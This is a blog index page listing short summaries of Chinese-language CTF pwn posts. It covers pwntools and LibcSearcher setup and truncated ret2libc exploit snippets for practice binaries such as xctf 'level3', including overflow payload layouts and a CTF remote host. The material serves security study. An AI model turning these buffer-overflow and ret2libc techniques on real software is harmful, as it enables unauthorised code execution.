摘要: pwntools工具安装 $ sudo apt-get update $ sudo apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential $ sudo pip install 阅读全文
posted @ 2019-11-21 15:11 夏了茶糜 阅读(124) 评论(0) 推荐(0)
摘要: GitHub地址: https://github.com/lieanu/LibcSearcher git clone https://github.com/lieanu/LibcSearcher.git cd LibcSearcher python setup.py develop 示例: from 阅读全文
posted @ 2019-11-21 15:09 夏了茶糜 阅读(2948) 评论(0) 推荐(0)
摘要: xctf pwn level3 #-*-coding:utf-8-*- from pwn import * p = process('./level3') #p = remote("111.198.29.45","36722") elf = ELF('./level3') libc = ELF('/ 阅读全文
posted @ 2019-11-21 15:09 夏了茶糜 阅读(335) 评论(0) 推荐(0)
摘要: #put函数调用 #函数名 + 返回地址 + 函数参数 payload = flat(['A' * 112, puts_plt, main, libc_start_main_got]) #write函数调用 #函数名 + 返回地址 + 函数参数1 + 需要输出的内容 + 输出的字节长度 payloa 阅读全文
posted @ 2019-11-21 15:09 夏了茶糜 阅读(355) 评论(0) 推荐(0)
摘要: 方法1(使用LibcSearcher): from pwn import * from LibcSearcher import LibcSearcher sh = process('./ret2libc3') ret2libc3 = ELF('./ret2libc3') puts_plt = ret 阅读全文
posted @ 2019-11-21 15:09 夏了茶糜 阅读(649) 评论(0) 推荐(0)